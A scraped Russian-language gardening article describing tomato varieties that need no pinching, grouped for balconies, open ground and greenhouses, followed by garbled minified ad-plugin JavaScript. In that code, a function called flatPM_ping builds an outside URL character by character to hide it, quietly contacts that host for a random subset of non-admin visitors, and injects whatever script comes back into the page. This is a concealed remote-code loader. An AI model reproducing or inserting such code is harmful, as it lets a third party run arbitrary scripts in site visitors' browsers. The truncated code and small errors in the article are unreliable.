Походящие варианты обязательно низкорослые или штамбовые. Обычно выращивают их в открытом грунте или под легкими пленочными укрытиями – парниками. Для теплиц подходят компактные или малооблиственные формы.

Фото-галерея некоторых сортов томатов, не требующих пасынкования с названиями:

Лучшие сорта томатов, не требующие пасынкования

Перечисленные ниже помидоры одинаково подходят для посадки на грядки открытого и защищенного грунта. Некоторые дают хорошие результаты при культивировании дома – на подоконнике, открытом или закрытом балконе, лоджии.

Растения с тонкими ломкими стеблями. Ранние плоды вызревают до 500 г, поэтому растение обязательно подвязывают. Цвет красно-розовый, мякоть сахаристая, сладкая.

Употребляют в основном свежими или при приготовлении горячих блюд. Впрок заготавливают как сок или соусы.

Боец (Буян)

Скороспелый детерминант. Ягоды цилиндрические, гладкие. Вес одной ягоды около 100 г. Окраска красная, желтая. Вкус сладкий с легкой кислинкой.

Пригоден для любых гастрономических целей.

Сорт устойчив к инфекциям, колебаниям температуры, недостатку влаги.

Балконное чудо

Скороспелый низкорослый культивар обильно и продолжительно плодоносит, поэтому его подвязывают к опоре. Обладает высокими декоративными качествами.

Помидоры небольшие – до 40 г грунтовые, 20 г – контейнерные, универсальные по применению.

Показывает высокую урожайность при любом способе выращивания – на открытых грядках, в контейнерах, теплицах. В последнем случае для экономии места его сажают между высокорослыми экземплярами.

В десятку

Неприхотливый янтарно-желтый томат. Плоды среднего и крупного размера, стандартный вес 170-200 г, сладкие, без растрескивания, универсальные в употреблении.

Растение надежно урожайно в любых погодных условиях и в холодных районах Урала и Сибири.

Гипербола

Среднеспелый томат, в условиях защищенного грунта, близких к идеальным.

Вырастает до 120 см, это требует подвязки и коррекции кроны.

Ягоды яйцеобразные, средней массы 90 г. Вкус отличный. Впрок заготавливают посолом.

Джина

Популярный детерминант средних сроков вызревания. Дает обильный урожай, поэтому его подвязывают к опоре.

Крупные, до 300 г весом, плоскоокруглые помидоры окрашены оранжево-красным цветом, отличные на вкус, пригодны для всех видов переработки и употребления свежими.

Сорт устойчив к фитофторозу и другим распространенным заболеваниям.

Дубок

Ранний помидор. Плоды округлые со слабой ребристостью яркого красного цвета, вес 70-10 г. Вкусовые качества отличные. Рекомендуется для употребления в свежем виде.

Резистентен к заболеваниям, засухе и обильным осадкам, отличается высокой сохранностью.

Ленинградский холодок

Раскидистые карликовые кустики дают томаты среднего размера, яйцевидные, классического «помидорного» цвета.

Дачники отмечают отличную урожайность в домашних условиях.

Метелица

Раннеспелый культивар ограниченного роста. Куст компактный, дает плоды массой до 100 г. Мякоть плотная, вкусная, употребляется в любых пищевых целях.

Растение обладает иммунитетом к распространенным болезням, нетребовательно в уходе. Урожай отличается хорошей сохранностью.

Санька

Всенародный любимец супер раннего созревания. Средний вес ягод около 100 г, окраска насыщенная, вкус замечательный. Особая ценность – нетребовательность в уходе и терпимость к недостаточной освещенности.

Устойчив к возбудителям инфекций томатов, редко поражается вредителями. Единственный недостаток – не годится для консервирования впрок.

Скороспелка

Идеальный для новичков ранний сорт. Форма и окраска помидоров классические, вес до 180 г.

Вынослив к любым погодным извращениям, успешно дает стабильный урожай во всех регионах, особенно в Сибири, так как без потерь переносит кратковременное понижение температуры ниже средней критический для культуры. Кулинарное применение без ограничений.

Челнок

Низкорослый куст с рано созревающим урожаем. Плоды удлиненные, темно-красные, весят около 70 г.

Мякоть сочная, сладкая, подходит для любого кулинарного использования.

Главное достоинство – отлично переносит понижения температуры до 10 °С, но подвержен заражению вирусами. Непривередлив в уходе.

Лучшие сорта томатов, не требующие пасынкования для открытого грунта

Предпочтение отдают невысоким разновидностям, а также практически всем мелкоплодным.

Агата

Раннеспелый сорт, формирующий компактные аккуратные кусты. Помидоры красные, округлые, слегка приплюснутые. Средний вес одной ягоды 80-110 г. Вкус выраженный, сладкий. Пригоден для длительного хранения, заготовки впрок.

Проявляет среднюю устойчивость к характерным заболеваниям культуры, часто страдает от фитофторы.

Аделина

Детерминант среднего срока вызревания. Плоды-сливки набирают массу до 90 г, сочные, сладкие на вкус. Одинаково хороши свежие или консервированные любым способом.

Устойчив к засухе, фузариозу. В открытом грунте выращивают в Северо-Кавказском регионе.

Айдитарод

Детерминантный среднеранний сорт. Томаты до 100 г весом имеют округлую форму с заостренным кончиком.

Сладкие, сочные, универсального применения.

Альфа

Ранняя штамбовая форма. Ягоды весом 60-80 г. округлые, слегка сплющенные, сочные, сладкие. Употребляют их свежими или перерабатывают на сок, соусы, пасту.

Один из немногих сортов, которые сажают семенами в открытый грунт в регионах рискованного земледелия.

Айсберг

Скороспелый томат, устойчивый к прохладной погоде.

Крупноплодный сорт, максимальный вес 200 г. Ягоды ярко-красные, плоскоокруглые, гладкие или слегка вытянутые, как мешочек, с незначительной ребристостью. Отличаются сочностью, сладким вкусом. В открытом грунте Сибири и Урала дает устойчиво хороший результат.

Биатлон

Ранний гибрид, красные ягоды массой до 80 г. Форма округлая с приплюснутым донцем.

Плодоношение слегка растянуто во времени, поскольку не все помидоры одной кисти созревают одновременно.

Бони ММ

Ультраскороспелый сорт со стабильной урожайностью. Кусты компактные.

Ягоды красной окраски округлые, слегка сплющены сверху и снизу. Ребристость выражена. Обычно применяют для заготовок на зиму или в свежем виде.

Томат непривередлив к условиям выращивания, мало восприимчив к заболеваниям культуры.

Вашингтон

Раннеспелый детерминант. Нуждается в опоре. Помидоры округлые, весят по 60-80 г.

Обладают отличным вкусом, употребляются свежими и как сырье для заготовки сока, соусов.

Гельфрут золотой

Среднеранний сорт, который желательно прикреплять к опоре. Плоды в форме сливки имеют золотисто-желтую окраску, весят около 100 г, устойчивы к растрескиванию.

Отличные вкусовые качества проявляют в свежем и консервированном виде.

Компактный штамб среднего срока. Томаты весом до 75 г удлиненной изящной формы, мякоть плотная, мясистая, с отличными вкусовыми показателями. Идеален в любом виде – свежем, консервированном, как составная часть горячих блюд.

Отличается устойчивостью к типичным заболеваниям вида, выдерживает длительную транспортировку.

Данко

Среднеспелый сорт. Полностью вызревшие плоды набирают массу до 170 г, имеют сердцеобразную форму. Окраска ярко-красная. В кулинарии используют свежими и для приготовления помидор в переработанном, отжатом виде.

Не боится засухи и болезней. Противопоказана длительная транспортировка – кожица быстро трескается.

Зимняя вишня

Штамбовое растение с ягодами малинового цвета округлой ровной формы, отличного вкуса. Употребляют свежими и консервированными.

Хорошо переносит похолодания и аномальную жару, устойчив к грибковым инфекциям, нетребователен в уходе.

Ракета

Детерминантный томат средних и ранних сроков созревания. Куст компактный, междоузлия короткие. Плоды небольшие, весят не более 60 г. Форма удлиненная с выраженным кончиком. Вкусовые качества высокие.

Чувствителен к соблюдению регламента полива и подкормок. Неустойчив к неблагоприятной погоде, что проявляется в растрескивании кожицы. К болезням и вредителям проявляет высокую сопротивляемость. Не склонен к перезреванию во время хранения или транспортировки. Применение – универсальное.

Чио-Чио-Сан

Среднеранний индетерминант. Растет до 2 м, требует подвязки к шпалерам. Допускается тепличное культивирования с нормированием боковых побегов.

Ягоды небольшие, средней массой около 40 г, ярко-розовые. Вкус нежный, сладкий, характерная кислинка не выражена. Используют свежими и консервированными.

Культивар устойчив к неблагоприятным условиям, типичным болезням пасленовых.

Лучшие сорта томатов, не требующие пасынкования для теплиц

Томаты, которые выращивают в тепличных условиях, обычно пасынкуют, чтобы обеспечить хорошее проветривание. Не требующие пасынкования сорта выбирают из числа дающих малую облиственность.

Аляска

Ранний сорт, нуждающийся в подвязывании. Опытные дачники советуют удалять часть пасынков на нижней части стебля. Плоды весят до 100 г обладают относительно хорошим вкусом, подходят для засолки, консервирования, свежих салатов.

Устойчив к фузариозу, табачной мозаике, кладоспориозу.

Детская сладость

Скороспелый маломерный компакт, формирует средние по размеру ягоды весом до 120 г насыщенного красного цвета. Кожица плотная, толстая, это обеспечивает длительную сохранность. Вкусовые качества отменные, его употребляют в свежем и маринованном виде.

В теплых районах страны возможно разведение в открытом грунте.

Обские купола

Раннеспелый гибрид тепличного культивирования. Высота достигает 1 м, поэтому растения подвязывают на шпалеры.

Помидоры довольно крупные, до 250 г, насыщенного розового цвета со слабо высветленными полосами. Форма округлая, с вытянутой нижней частью. Кулинарное назначение – универсальное.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};